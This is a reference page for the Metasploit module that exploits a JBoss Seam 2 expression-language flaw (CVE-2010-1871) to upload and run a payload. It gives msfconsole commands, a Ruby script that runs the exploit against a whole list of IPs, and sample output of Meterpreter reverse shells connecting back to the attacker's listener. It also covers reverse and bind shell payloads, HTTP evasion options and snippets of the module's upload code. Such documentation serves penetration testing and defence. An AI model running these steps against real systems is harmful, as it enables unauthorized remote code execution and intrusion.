JBoss Seam 2 File Upload and Execute - Metasploit


This page contains detailed information about how to use the exploit/multi/http/jboss_seam_upload_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: JBoss Seam 2 File Upload and Execute
Module: exploit/multi/http/jboss_seam_upload_exec
Source code: modules/exploits/multi/http/jboss_seam_upload_exec.rb
Disclosure date: 2010-08-05
Last modification time: 2021-01-28 10:35:25 +0000
Supported architecture(s): -
Supported platform(s): Java
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2010-1871

Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly sanitize inputs to some JBoss Expression Language expressions. As a result, attackers can gain remote code execution through the application server. This module leverages RCE to upload and execute a given payload. Versions of the JBoss application server (AS) admin-console are known to be vulnerable to this exploit, without requiring authentication. Tested against JBoss AS 5 and 6, running on Linux with JDKs 6 and 7. This module provides a more efficient method of exploitation - it does not loop to find desired Java classes and methods.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Using jboss_seam_upload_exec against a single host

Normally, you can use exploit/multi/http/jboss_seam_upload_exec this way:

msf > use exploit/multi/http/jboss_seam_upload_exec
msf exploit(jboss_seam_upload_exec) > show targets
    ... a list of targets ...
msf exploit(jboss_seam_upload_exec) > set TARGET target-id
msf exploit(jboss_seam_upload_exec) > show options
    ... show and set options ...
msf exploit(jboss_seam_upload_exec) > exploit

Using jboss_seam_upload_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your jboss_seam_upload_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/jboss_seam_upload_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the multi/http/jboss_seam_upload_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/jboss_seam_upload_exec

[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/jboss_seam_upload_exec) > show info

       Name: JBoss Seam 2 File Upload and Execute
     Module: exploit/multi/http/jboss_seam_upload_exec
   Platform: Java
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2010-08-05

Provided by:
  vulp1n3 <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Java Universal

Check supported:
  Yes

Basic options:
  Name       Current Setting                                                  Required  Description
  ----       ---------------                                                  --------  -----------
  AGENT      Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)  yes       User-Agent to send with requests
  CHUNKSIZE  1024                                                             no        Size in bytes of chunk per request
  CTYPE      application/x-www-form-urlencoded                                yes       Content-Type to send with requests
  FNAME                                                                       no        Name of file to create - NO EXTENSION! (default: random)
  Proxies                                                                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080                                                             yes       The target port (TCP)
  SSL        false                                                            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /admin-console/login.seam                                        yes       URI that is built on JBoss Seam 2
  TIMEOUT    10                                                               yes       Timeout for web requests
  VHOST                                                                       no        HTTP server virtual host

Payload information:

Description:
  Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly 
  sanitize inputs to some JBoss Expression Language expressions. As a 
  result, attackers can gain remote code execution through the 
  application server. This module leverages RCE to upload and execute 
  a given payload. Versions of the JBoss application server (AS) 
  admin-console are known to be vulnerable to this exploit, without 
  requiring authentication. Tested against JBoss AS 5 and 6, running 
  on Linux with JDKs 6 and 7. This module provides a more efficient 
  method of exploitation - it does not loop to find desired Java 
  classes and methods.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-1871
  https://bugzilla.redhat.com/show_bug.cgi?id=615956
  http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html
  http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html

Module Options


This is a complete list of options available in the multi/http/jboss_seam_upload_exec exploit:

msf6 exploit(multi/http/jboss_seam_upload_exec) > show options

Module options (exploit/multi/http/jboss_seam_upload_exec):

   Name       Current Setting                                                  Required  Description
   ----       ---------------                                                  --------  -----------
   AGENT      Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)  yes       User-Agent to send with requests
   CHUNKSIZE  1024                                                             no        Size in bytes of chunk per request
   CTYPE      application/x-www-form-urlencoded                                yes       Content-Type to send with requests
   FNAME                                                                       no        Name of file to create - NO EXTENSION! (default: random)
   Proxies                                                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080                                                             yes       The target port (TCP)
   SSL        false                                                            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /admin-console/login.seam                                        yes       URI that is built on JBoss Seam 2
   TIMEOUT    10                                                               yes       Timeout for web requests
   VHOST                                                                       no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

Advanced Options


Here is a complete list of advanced options supported by the multi/http/jboss_seam_upload_exec exploit:

msf6 exploit(multi/http/jboss_seam_upload_exec) > show advanced

Module advanced options (exploit/multi/http/jboss_seam_upload_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        2                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/jboss_seam_upload_exec module can exploit:

msf6 exploit(multi/http/jboss_seam_upload_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Java Universal

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/jboss_seam_upload_exec exploit:

msf6 exploit(multi/http/jboss_seam_upload_exec) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/jboss_seam_upload_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/jboss_seam_upload_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> Exploit failed


Here is a relevant code snippet related to the "<RHOST>:<RPORT> Exploit failed" error message:

115:	        }, timeout=datastore['TIMEOUT'])
116:	        if (res and res.code == 302 and res.headers['Location'])
117:	            if (res.headers['Location'] =~ %r(user=java.lang.UNIXProcess))
118:	                vprint_good("#{rhost}:#{rport} Exploit successful")
119:	            else
120:	                vprint_error("#{rhost}:#{rport} Exploit failed")
121:	            end
122:	        else
123:	            vprint_error("#{rhost}:#{rport} Exploit failed")
124:	        end
125:	    end

<RHOST>:<RPORT> Exploit failed


Here is a relevant code snippet related to the "<RHOST>:<RPORT> Exploit failed" error message:

118:	                vprint_good("#{rhost}:#{rport} Exploit successful")
119:	            else
120:	                vprint_error("#{rhost}:#{rport} Exploit failed")
121:	            end
122:	        else
123:	            vprint_error("#{rhost}:#{rport} Exploit failed")
124:	        end
125:	    end
126:	
127:	
128:	    def call_jsp(jspname)

Failed to request JSP


Here is a relevant code snippet related to the "Failed to request JSP" error message:

142:	            'data' => "sessionid=" + Rex::Text.rand_text_alpha(32)
143:	        }, timeout=datastore['TIMEOUT'])
144:	        if (res and res.code == 200)
145:	            vprint_good("Successful request to JSP")
146:	        else
147:	            vprint_error("Failed to request JSP")
148:	        end
149:	    end
150:	
151:	
152:	    def upload_jsp(filename,jarname)

Failed to upload file.


Here is a relevant code snippet related to the "Failed to upload file." error message:

162:	        vprint_status("Uploading JSP to launch payload")
163:	        status = upload_file_chunk(filename,'false',jsp_text)
164:	        if status
165:	            vprint_status("JSP uploaded to to #{filename}")
166:	        else
167:	            vprint_error("Failed to upload file.")
168:	        end
169:	
170:	        @pl_sent = true
171:	    end
172:	

Failed to upload chunk


Here is a relevant code snippet related to the "Failed to upload chunk" error message:

239:	        while (data.length > chunk_size)
240:	          status = upload_file_chunk(@payload_exe, append, data[0, chunk_size])
241:	          if status
242:	            vprint_status("Uploaded chunk")
243:	          else
244:	            vprint_error("Failed to upload chunk")
245:	            break
246:	          end
247:	          data = data[chunk_size, data.length - chunk_size]
248:	          # first chunk is an overwrite, afterwards, we need to append
249:	          append = 'true'

Failed to upload file.


Here is a relevant code snippet related to the "Failed to upload file." error message:

250:	        end
251:	        status = upload_file_chunk(@payload_exe, 'true', data)
252:	        if status
253:	            vprint_status("Payload uploaded to " + @payload_exe)
254:	        else
255:	            vprint_error("Failed to upload file.")
256:	        end
257:	
258:	        # write a JSP that can call the payload in the jar
259:	        upload_jsp(jsp_name, @payload_exe)
260:	

Invalid chunk size <CHUNK_SIZE>


Here is a relevant code snippet related to the "Invalid chunk size <CHUNK_SIZE>" error message:

280:	            # chunking code based on struts_code_exec_exception_delegator
281:	            append = 'false'
282:	            chunk_size = datastore['CHUNKSIZE']
283:	            # sanity check
284:	            if (chunk_size <= 0)
285:	                vprint_error("Invalid chunk size #{chunk_size}")
286:	                return
287:	            end
288:	
289:	            vprint_status("Sending in chunks of #{chunk_size}")
290:	

Unsupported target platform!


Here is a relevant code snippet related to the "Unsupported target platform!" error message:

290:	
291:	            case target['Platform']
292:	            when 'java'
293:	                java_stager(fname, chunk_size)
294:	            else
295:	                fail_with(Failure::NoTarget, 'Unsupported target platform!')
296:	            end
297:	
298:	            handler
299:	        end
300:	    end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • vulp1n3 <vulp1n3[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.2.9-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.